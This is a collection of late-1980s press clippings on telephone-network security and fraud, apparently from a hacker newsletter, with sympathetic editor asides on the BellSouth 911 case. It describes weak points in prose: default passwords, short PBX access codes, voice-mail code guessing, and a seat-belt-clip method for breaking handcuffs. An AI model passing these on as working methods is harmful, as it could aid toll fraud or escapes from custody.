----EDITOR's NOTES: As is confirmed in this article, no telephone service was disrupted. The extent of BellSouth's inadequacy regarding security matters was not detailed in these articles. Here is a rundown of what may have possibly happened: BellSouth's SBDN (Southern Bell Data Network) which is a modified Telenet network that contains hundreds if not thousands of network nodes (individual systems) may have been accessed during which time the system that controls the entire network may have been possibly compromised. This would allow someone to access just about any system on the network, since Bellsouth consolidated most of their individual systems onto a large network (economically not a bad idea, but a security nightmare indeed). This may allow one to stumble onto systems dealing with 911. Since it may be interesting to learn how such a system operates and how the 'automatic trace' is accomplished, the documentation would be of some help. No need for any actual programs however. Possibly, maybe, an article paraphrased the operation of 911 and was possibly to be distributed through the Phrack, Inc. newsletter. The last names of those involved were omitted. Go look them up for yourself if you think its that important. Just for the record: KNIGHT LIGHTNING NEVER WAS A MEMBER OF LOD. Yet another error in the reporting...LOD has half the 15 supposed number of members. Another article followed the above one on the same page, by the same author: Last week's disclosure of an alleged hacker theft of highly sensitive BellSouth Telephone Co. documentation for a nine-state 911 emergency system was the second serious security breach of a telephone company network to come to light in as many months. In January, a trio of hackers was able to penetrate computer systems at Pacific Bell Telephone Co. and eavesdrop on conversations and perpetrate other criminal acts. [CW, Jan. 22]. Just how vulnerable are the nation's telephone systems to hacker attacks? Spokesmen for BellSouth and Pacific Bell insist that their systems are secure and that they and other telephone companies routinely assess their vulnerability to hackers. "Security is being constantly changed, every intrusion is studied, passwords are changed," said Terry Johnson, manager of media relations for BellSouth in Atlanta. Johnson however, declined to say how the hackers allegedly were able to lift the documentation to a 911 emergency communication services program. "It is a rather serious computer security breach," said Richard Ichikawa, a Honolulu based telecommunications consultant who specializes in designing and installing 911 emergency systems. Stealing documentation, as the Legion of Doom member is alleged to have done, many not be a particularly difficult task for a savvy hacker, he said. Taking the actual program, while certainly possible, would be much more challenging, however. The computer the controls enhanced 911 service is "quite isolated" from the calling public, Ichikawa said. A recently published report to Congress by the Office of Technology Assessment suggested that the security and survivability of the nation's communication infrastructure is at greater risk to hacker attacks than ever before. Business and government reliance on communications and information based systems has increased, thus much more is at stake when those systems fail, the report stated. The increased publicity of hacker attacks may help to curb attacks by hackers, said Sanford Sherizen, a security consultant at Data Security Systems, Inc., in Natick, Mass. Some law enforcement officials complain that the nation's telephone firms do not cooperate as readily as they would expect when attacks of this sort occur. "They [telecommunications providers] are the single biggest headache law enforcers have right now," said Gail Thackery, Arizona stat assistant district attorney. Regional Bell operating companies contacted last week disputed that assertion. _____________________________________________________________________________ Source: CFCA (Communications Fraud Control Association) Communicator Issue: February-March 1989 Title: But are LD networks safe? Spread over vast distances and segmented by switches guarded by their own passwords, long distance networks are generally safe from virus attacks. According to Henry Kluepfel, Bellcore district manager of Security Planning intruders can easily attain the same information that is available to vendors and service providers. "If passwords are not changed regularly, intruders can quickly wreak havoc". Scott Jarus, division director of Network Loss Prevention for Metromedia, and a member of CFCA's Board of Directors, says that users of "outboard" computer systems should not be assigned high level access to their company's switches or networks. "Non-proprietary hardware and software that handle such functions as billing collection and network database management are targets for unauthorized access and viruses", he says. Mr. Kluepfel says that once hackers have the documentation they can send details on how to crash the systems to hundreds of bulletin boards. "We found that many system administrators didn't realize manufacturers install rudimentary default passwords." Bellcore encourages using sophisticated codes and applying a variety of defenses. "Don't simply rely on a dialback modem, or a good password", says Mr. Kluepfel. "Above all, don't depend on a system to always perform as expected. And remember that new employees don't know the administrative measures the operator knows". Managers should advise clients on any needed internal analysis and investigations, and keep abreast of technological advances when planning their defenses. _____________________________________________________________________________ Source: Same as above Title: Secure those gray boxes After the FCC mandated that telcos provide test modes on the gray [or green (ed. note)] connection boxes usually found outside structures, there have been instances of persons surreptitiously clipping on handsets or snapping in modular connections (RJ-11) to make long distance calls on the residents' line. CFCA advises customers to padlock their boxes to deter such thievery. John Venn, manger of Electronic Operations at PacBell's San Francisco office, reports that the boxes they install have separate connections for company and customer use, so that users have the option of securing access to their portion. PacBell's side has a built-in lock, while customers have padlock hasps. _____________________________________________________________________________ Source: Same as above Title: Product Description: Pen-Link analysis software Author: Mike Murman Since 1986, Pen-Link, Ltd. of Lincoln Neb. has been producing software that supports telecom investigations. Last July, the company introduced an updated version of Pen-Link, a two-year-old program that accepts data from most Dialed Number Recorders (DNRs) manufactured today, pools that information into a common database structure, and allows the user to determine the calling patterns and the codes that have been compromised. In today's ever-expanding telecommunications environment there is a need for faster identification and documentation of abuser call patterns to assure successful prosecutions. In applications of DNRs for investigative purposes, Pen-Link programs have reduced the time normally needed to input, analyze and report call data by as much as 90 percent. The result is improved productivity and quicker response to customers' needs. The Pen-Link 2.0 program also provides several related features. First, it is a communications program, meaning that if you are using a DNR with modem capability or RS232 communication ports, the program can automatically load your call records into a PC, eliminating the time needed to key-in call record data. Second, Pen-Link has an autoload format section that takes call records you have transferred and puts them into a standard record format. This is an important feature, given that the program supports multiple types of DNR hardware that all have unique call data formats. In short, you can use any combination of DNRs in your investigations with Pen-Link and all data will be compatible. Furthermore, the program allows you the flexibility of purchasing new DNRs of any type, and not worry about duplicating your software expense or learning new software programs. [Notice how he keeps saying "you" in this article? (ed.)] Finally, Pen-Link enables you to analyze and report on your call record information. There are 15 different call analysis reports and 6 different graphic reports. If these reports do not meet your needs, the program has a report generator that allows you to customize your analysis and reports. Pen-Link is a dedicated program written in Turbo Pascal. The company elected to start from scratch and develop its own software, rather than simply adapting standard applications. There are two reasons for this approach: dedicated software programs run more efficiently, so that if a hacker is generating thousands of call records and you want to analyze and report this information, the program can provide a report much faster than if you were processing the data manually. The second reason behind this strategy is that users only need to learn and understand the options for the pop-up menu format. Pen-Link also supports color monitors. A manual editing feature allows you to enter your database and find specific records by the criteria you have selected; then review and edit the data. Manual editing also allows you to enter call data from old pen registers that only produce paper strips containing call information. Another feature, the utilities section, provides several options to manage call information stored in your computer. This allows you to archive information to disk, then reload it later when it is needed. If your data files become corrupted, you can reconstruct and reformat them by using the utilities section. And if you wish to use your call data information in another application program, Pen-Link's utilities allow you to create an ASCII text file of call information, which then can be read by these programs. Furthermore, the program can accept ASCII text files from other DNR software programs. The program calls for an IBM or compatible PC equipped with a hard drive, operating under MS-DOS 2.1 or higher. Pen-Link currently supports the following DNRs: JSI, Mitel, Racom, Voice ID, Hekimian, Bartec, Pamco, HDS, and Positive Controls. If you are using a DNR that is not listed, Pen-Link, LTD will program its software so it can automatically load call records from your equipment. The use of DNRs that automatically transfer call record data saves your security department considerable investigative time. Pen-Link's mission is to provide telcom security departments with a sophisticated investigative software tool that is easy to use, flexible and compatible. _____________________________________________________________________________ Source: Same as above Title: Extended Ky. case resolved A 21 year-old Kentucky man was successfully convicted October 27 on 14 counts of computer and toll fraud under a number of state statutes. The defendant, John K. Detherage, pleaded guilty to using his personal computer to identify authorization codes in order to place unauthorized long distance calls valued at $27,000. Detherage had been indicted a year earlier by an Oldham County grand jury on six felony counts related to the scam and two misdemeanor counts of possessing stolen personal identification and calling card numbers. He was later charged with two additional counts of possessing stolen PINs. Detherage originally was to have been tried in February 1988, but the case was postponed when he pleaded guilty. He was sentenced at the Oldham County Circuit Court at LaGrange to pay $12,000 in restitution, and relinquish all computer equipment and software to the court. His charges included theft of services over $100; theft of services; four counts of unlawful access to a computer, second degree; possession of stolen credit or debit cards, and six counts of unlawful access to a computer. Four other counts were dismissed. Kentucky has a number of statutes that can be applied to theft of telephone services. Chapter 514.060 addresses theft of services, while 514.065 describes the possession, use or transfer of a device for the theft of services. Theft of services is defined to include telephone service, and the defendant was charged with two counts under 514.060. Detherage was also charged with 10 counts (six felony and four misdemeanor) under Chapter 434.580, which relates to the receipt of stolen credit cards. Kentucky interprets computer crime as involving accessing of computer systems to obtain money, property or services through false or fraudulent pretenses, representations or promises. _____________________________________________________________________________ Source: Same as above Title: Industry Overview As major players in the telecom industry shore up the defenses on their telephone and computer networks, criminals [who, us?] are turning to smaller, less protected companies [its called survival of the fittest]. In 1988, the use of stolen access codes to make free long distance calls continued to be the favorite modus operandi among network intruders throughout the industry, although code abuse leveled off or declined among large carriers with well funded security organizations and substantial technical apparatus to defeat most toll and network fraud. However, some resellers and PBX owners are being victimized by fraud of all types, probably because most use access codes with only six or seven digits. Such vulnerable systems will continue to be used by abusers to route long distance calls overseas. Fraudulent calls placed on a compromised system quickly accumulate charges the system owner must eventually pay. Many PBX's also lack effective systems able to detect irregular activities and block fraudulent calls. Add to this the fact that several carriers may be handling the inbound and outbound WATS lines, and investigator's jobs can really become complex. The sharp increase in the abuse of voice store-and-forward systems, or voice mail, that began alarming owners and manufacturers early last year will continue through 1989. Last spring, traffickers began seizing private voice mail systems to coordinate drug shipments. Messages can be quickly erased when they are no longer needed. Dealers have been receiving mailbox numbers by pager, then calling in recorded messages from public telephones. No matter how long a security code may be, if intruders obtain an 800 number to a voice mail system they can program a computer and take the time to break it, because it won't cost them anything. Once accessed through a PBX, intruders can exchange stolen lists of long distance access codes, usually without the system owner's knowledge. The time it takes abusers to break into a voice mail system is proportionate to the number of digits in a security code. A four-digit code can, for example be beaten by a skilled computer operator in slightly over a minute. [Clarification, this is probably through the use of default security codes, not sequential or random scanning techniques. ed.] One problem is that voice mail customers don't often know what features to select when buying a system. And few manufactures take the initiative to advise customers of the importance of security. Another problem that has been around for several years, subscription fraud, will continue into 1989, although telcos have reduced it by making customer's applications more detailed and comprehensive [like requiring customers to supply their credit card numbers. This way if they skip town without paying and the credit card is valid and not maxed out, the phone company can still recover the money owned them. ed.], and by checking out potential customers more thoroughly. Dishonest subscribers use false identification and credit references to obtain calling cards and services, with no intention of paying. Intelligent software is available that aids switch and PBX owners in identifying, screening and blocking fraudulent calls. Another precaution is to add digits to access codes, because numbers of fewer than 10 digits cannot withstand today's intruders. A number of carriers have already gone to 14 digits. Some larger carriers have been sending technical representative out to reprogram PBX's, encourage customers to install better safeguards, and advise them to shut down their systems at night and on weekends. Customers should also expect to see billing inserts warning of the improved defenses against fraud. As more companies break into the international market they will need solid security safeguards to protect them against intrusions of their networks. A small interexchange carrier (IC) in Alabama was hit hard recently by "phone phreakers" soon after they opened overseas service. Other start-ups find themselves desperately trying to play catch up after blithely operating several years without a hitch. An IC with 30,000 customers in Southern California increased its seven-digit access codes to ten digits and it aggressively pursuing five groups of hackers its investigators uncovered after discovering that company-issued personal identification numbers were posted on computer bulletin boards. In the final analysis, one fact emerges: widespread cooperation among injured parties will ensure quicker results and conserve vital company resources. _____________________________________________________________________________ Source: PC Week April 10,1989 Title: Keep an Ear Out for New Voice Technology Author: Matt Kramer With the rise in digital transmission of voice and data, it's easy to assume that voice and data have merged into a muddle of indiscriminate material, with voice indistinguishable from data. After all, a bit's a bit, right? But, those people in the white lab coats keep coming up with new ways to use voice technology. The telephone companies are the ones poised to make the most of this technology. U.S. Sprint recently announced that it was experimenting with the use of "voice prints"--a recording of a verbal password that would be used to help identify authorized subscribers using their U.S. Sprint telephone charge cards, which would help cut down on hackers trying to steal telephone service. Subscribers would record a voice print of a verbal password. Then, when they were using their charge cards, they would repeat the passwords to verify their identities. Northern Telecom has embarked on its own efforts to bring voice-recognition technology to public telephone service. it is selling telephone companies a new billing service that uses voice-recognition technology to automate collect and third-number billing calls. Called the Automated Alternate Billing Service (AABS), the system calls the party to be billed and "asks" if the charges will be accepted. The Northern Telecom switch "listens" to the response and either completes the call or informs the calling party that the charges have been refused. Northern Telecom also plans to use voice technology to offer other features, such as allowing the system to announce the caller's name in the party's own voice and stating the call's origin, such as the name of a city, a university or an institution. The big draw for phone companies, of course, is reduction of personnel costs, since no human operator assistance is needed. That's an option for lots of corporate financial officers who have been attracted to automated-attendant phone systems because they can replace a bevy of switchboard operators. What would be interesting about the Northern Telecom technology is to see if it can be expanded to other gear, such as private branch exchanges, and if if can beef up the automated-attendant feature. Rather than require callers to punch a lot of buttons to get in touch with someone, perhaps voice recognition could be used to "listen" for a name and then direct the call to the appropriate party. That would be especially useful in situations where you don't know the exact extension of whomever you are calling. Trying to maneuver around an on-line telephone directory can be a real pain in the neck. At the same time, voice-recognition technology can be paired with voice mail so that users can access their voice mailboxes without having to punch in an identification number or password or to deal with a menu. It would be a lot easier to just say, "Read messages". There's still a lot of potential to be developed in voice technology. _____________________________________________________________________________ Source: PC WEEK May 15, 1989 Title: MCI to Provide Transition to ISDN Author: Matt Kramer MCI Communications Inc. hopes to give its customers a smoother transition to ISDN with new services that offer many of the technology's features without requiring costly upgrades to ISDN-compatible equipment. The communications company recently announced new Integrated Services Digital Network and "ISDN-equivalent" services that will provide MCI customers with network-configuration, control and management features, according to company officials. The equivalent services, which will be available this fall, run over existing in-band signaling channels. True ISDN services require a separate out-of-band D channel for signalling. MCI's full ISDN services are scheduled for delivery in the first quarter of next year. The equivalent services, while not providing the full ISDN feature set, are designed to introduce customers to the benefits of ISDN before requiring them to make the investment in ISDN-compatible telecommunications gear, officials said. "While they may not want to make that expenditure now, they certainly want to have ISDN-like services available", said Kevin Sharer, senior vice president of sales and marketing at MCI, in Washington. The equivalent products include the MCI 800 Enhanced Services Package, which allows customers with dedicated access lines to receive the number of the calling party just prior to receiving the call. This Automatic Number Identification (ANI) is then used to query a database to bring up a customer's account or other information, according to officials. Northern Telecom Inc. and Rockwell International Corp. have developed new software for their private branch exchanges that permits the switches to handle in-band ANI transmission. Some observers expect the equivalent services will be useful in the evolution from existing telecommunications to ISDN. "If all you need is ANI, then the equivalent services might be just what you want", said Claude Stone, vice president of product development at the First National Bank of Chicago and vice chairman of the national ISDN Users Forum. _____________________________________________________________________________ Source: A newspaper Date: Sometime in June Title: Sheriff's prisoners find handcuffs are a snap to get out of Author: unknown Ten jail prisoners who discovered an ingenious way to escape from handcuffs are sending alarms across the nation. Emergency bulletins will be sent to law enforcement agencies via teletype machines nationwide. On Friday, deputies were taking 10 prisoners from the jail downtown to another one in the city. All were handcuffed. "When the deputy opened the back of the van, all 10 guys were smiling and said, 'See what we did,'" the Sheriff said. Each prisoner held up his arms to show broken handcuffs. The culprit was a simple seat belt clip. The circular cuffs are connected with a chain, held tightly to each cuff by a swivel-head link that moves freely to ensure that the chain cannot be twisted when the wrists move. Seat belt clips typically have one or two holes, or slots, that lock them into place with the buckle. The prisoners learned that jamming the swivel-head on the clip stops the swivel head from turning freely. "A quick twist of the wrist, and the chain shears off at the cuff," the sheriff said. The sheriff ordered seat belts removed from jail vans. He also ordered that the prisoners in cruisers be handcuffed with their hands behind their back and the seat belts locked firmly across them. Deputies often handcuffed prisoners' hands in front of their bodies. But even if prisoners were cuffed behind their backs, it would not be difficult for them to manipulate the swivel head into a seat belt buckle and twist themselves free -- if they could reach the seat belt. "This is a danger to every law enforcement officer in the country", the sheriff said. Handcuff manufacturers contacted Friday are studying the possibility of redesigning the handcuffs by enlarging the swivel head or placing some type of shroud over it. "People in jail have 24 hours a day to figure a way out" said the sheriff. "Although only 10 people know the technique, I guarantee that the entire jail population will know how to do it before the day is up,". "The only people who won't know about it is law enforcement officers". The sheriff met Friday with representatives of several local and federal agencies. An FBI spokesman said the escape technique will be described in the FBI's nationally distributed LAW ENFORCEMENT BULLETIN. Although the sheriff was grateful to learn about the technique from prisoners who did not try to escape, he was not amused. He told deputies, "Charge them with destruction of county property. We'll see how funny they think that is." _____________________________________________________________________________ Title: Federal grand jury probes Cincinnati Bell wiretapping flap Source: Data Communications Issue: November 1988 Author: John Bush A federal grand jury in Ohio is investigating illegal wiretapping allegations involving two former employees of Cincinnati Bell who claim the telephone company ordered them for more than a decade to eavesdrop on customers. In addition, an attorney who filed a class-action lawsuit against Cincinnati Bell on behalf of the people and companies who were allegedly wiretapped, says he is trying to prove that the telephone company sold the information gained from the electronic surveillance. A Cincinnati Bell spokesperson denied the charges, saying they were trumped-up by the two former employees, who are seeking revenge after being fired by the telephone company. The lawsuit has been filed against Cincinnati Bell Inc. on behalf of Harold Mills, a former police lieutenant and former commander of the Cincinnati Vice Squad, as well as a number of other individuals and companies. Among the alleged victims mentioned in the complaint were Sen. Howard Metzenbaum (D-Ohio) and Proctor and Gamble Co. (Cincinnati, Ohio). Gene Mesh, the attorney who filed the lawsuit, believes the Cincinnati Bell case is not an isolated incident but a trend...an explosion of cancer that "this kind of thing [wiretapping] has developed its own markets." When asked if Cincinnati Bell was selling the information gained from tapping, Mesh said "we are proceeding along evidentiary lines to prove this." Thus far, the civil action hinges on the testimony of two former Cincinnati Bell employees, Leonard Gates, a supervisor, and Robert Draise, an installer who at one time worked for Gates. Their combined testimony states that, under the auspices of Cincinnati Bell, they conducted over 1,200 illegal wiretaps from 1972 to the present. According to Gates, as a result of the Proctor and Gamble wiretap, "we were into all of P&G's databases." In addition, both Gates and Draise claim to have been in on illegal wiretaps of General Electric Co.'s Aircraft Engines Division near Cincinnati. Draise also claims that he was ordered to identify all of GE's facsimile and modem lines for Cincinnati Bell. Neither Proctor and Gamble nor General Electric would comment. However Sen. Howard Metzenbaum's Washington, D.D., office says that the Senator "found the news shocking and is awaiting more information to see if it [the wiretap] actually happened. Meanwhile Cincinnati Bell maintains that the suit and allegations are merely Gates's and Draise's way of getting back at the phone company for having fired them. Cyndy Cantoni, a spokesperson for Cincinnati Bell, said that "we have heard the allegations that we wiretapped, but if Draise or Gates did any tapping, it wasn't done at Cincinnati Bell's request." Cantoni also cited a letter from Cincinnati Bell President Ray Clark that went out to all Cincinnati Bell employees in the wake of the publicity surrounding the wiretapping accusations. The letter stated that Gates had been warned in April 1985 against continuing an affair with an employee he had been supervising and who had accused him [Gates] of sexual harassment, according to Cantoni. The letter went on to say that Gates reacted to the warning with insubordination and threats and "carried on a campaign against the company." As a result, Gates was fired for insubordination, says Cantoni. Robert Draise was fired after he was convicted of misdemeanor wiretapping charges for tapping the phone line of a friend's girlfriend, Cantoni says. Cincinnati Bell is an independent telephone company that was allowed to keep the "Bell" trademark after divestiture, since it is older than AT&T, says Cantoni. [ End of Document ] [ End Of The LOD/H Technical Journal Issue #4 ]